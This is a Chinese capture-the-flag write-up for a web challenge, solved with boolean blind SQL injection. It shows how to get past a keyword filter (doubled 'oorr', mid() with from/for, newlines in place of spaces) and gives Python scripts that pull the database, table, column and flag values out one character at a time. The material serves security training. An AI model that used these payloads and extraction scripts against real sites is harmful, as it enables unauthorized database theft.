认真一点!
打开链接,看到这个页面,第一反应又是sql注入
翻翻源码没有任何提示
打开burp开始抓包,包头与返回头又没有任何提示,试着开始修改ID 的值,观察页面变化。
-
提交1或用语句让框内为真,显示You are in。
-
提交语句有错误或语句让框内为假,不报错,但显示You are not in(实质和报错一样)
-
提交某些特殊字符会被过滤并显示sql injection detected,经过各种测试(可用Burp suite进行模糊测试或脚本提交敏感字符)发现过滤的字符有and,空格,+,#,union,逗号。
-
提交语句id=1’or’1’='2,如果网页对or没有任何处理的话,应返回You are in(因为后面的语句错误,相当于只提交id=1),但返回的却是You are not in,说明or被处理了。一般的后台处理逻辑是匹配or、or(不分大小写)、or+空格并替换为空。尝试改变大小写和用oorr代替,发现回显都为You are in,也就是说,后台处理应该是匹配or(小写),并将其替换为空,并且仅仅处理了一次。所以在接下来的语句构造中我们可以用oorr,OR等代替or。
接下来用python脚本进行盲注
-
由于提取字符函数substr()被过滤了,用mid()函数达到同样效果
-
由于逗号被过滤了,在mid()函数中用from(%d)for(1)代替逗号分隔符,如mid((database())from(1)foorr(1))代表库名第一个字母(for中的or也被过滤了,所以用foorr)。
-
由于空格被过滤了,我们用
flag = flag.replace(’ ', chr(0x0a))
将构造语句中的空格用chr(0x0a),也就是换行符\n替代(这也行?),其实在原代码语句中,后面用括号代替空格的情况也可以改回用空格了。 -
提醒requests.post(url,data)中的data一定要是字典{id:“ ”}。
-
猜长度的语句和猜字母的一样,只不过放在后面的字母为’’,同时做一个计数器,当匹配到空时,说明名字匹配结束,返回计数器当前的数字就是名字长度。
(group_concat(table_name separatoorr ‘@’)
(group_concat(column_name separatoorr ‘@’)
用以上语句代替table_name和column_name,是因为可能有多个表段和多个字段,这个语句让多个表名,字段名一起输出并用@将之分隔。
当前数据库名的长度:
import requests
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,30):
key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
r = requests.post(url, data=key).text
print(i)
if str1 in r:
print('the length of database is %s'%i)
break
接下来开始跑数据库名:
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
database = ''
for i in range(1,19):
for j in guess:
key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
r = requests.post(url, data=key).text
print(key)
if str1 in r:
database += j
print(j)
break
print(database)
接下来跑表的长度:
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
i = 1
while True:
flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0"%i
flag = flag.replace(' ', chr(0x0a))
key = {'id':flag}
r = requests.post(url, data=key).text
print(key)
if str1 in r:
print('the length of tables is %s'%i)
break
i += 1
接下来跑表名:
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
tables = ''
for i in range(1,12):
for j in guess:
flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i, j)
flag = flag.replace(' ', chr(0x0a))
key = {'id':flag}
r = requests.post(url, data=key).text
print(key)
if str1 in r:
tables += j
print(j)
break
print(tables)
跑完发现有两张表,两张表之间用@分隔开来,一看就知道flag就在fiag表中了,接下来跑列长:
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
i = 1
while True:
flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%i
flag = flag.replace(' ', chr(0x0a))
key = {'id':flag}
r = requests.post(url, data=key).text
print(key)
if str1 in r:
print('the length of columns is %s'%i)
break
i += 1
接下来跑列名:(这里虽然写的6,但我们的搜索条件是第6个为空,那么字符长度应该为5)
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
columns = ''
for i in range(1,6):
for j in guess:
flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i, j)
flag = flag.replace(' ', chr(0x0a))
key = {'id':flag}
r = requests.post(url, data=key).text
print(key)
if str1 in r:
columns += j
print(j)
break
print(columns)
接下来跑字段长度:
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
i = 1
while True:
flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='')oorr'0"%i
flag = flag.replace(' ', chr(0x0a))
key = {'id':flag}
r = requests.post(url, data=key).text
print(key)
if str1 in r:
print('the length of data is %s'%i)
break
i += 1
这里虽然跑出来14位,可是后面发现根本不止14位。因为数据中含有的-是空格转义来的,脚本识别到就以为数据结束了。最后把flag跑出来:
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
data = ''
for i in range(1,20):
for j in guess:
flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i, j)
flag = flag.replace(' ', chr(0x0a))
key = {'id':flag}
r = requests.post(url, data=key).text
print(key)
if str1 in r:
data += j
print(j)
break
print(data)
因为这里的-实际是由空格转义来的,所以真正的flag是flag{haha~you win!}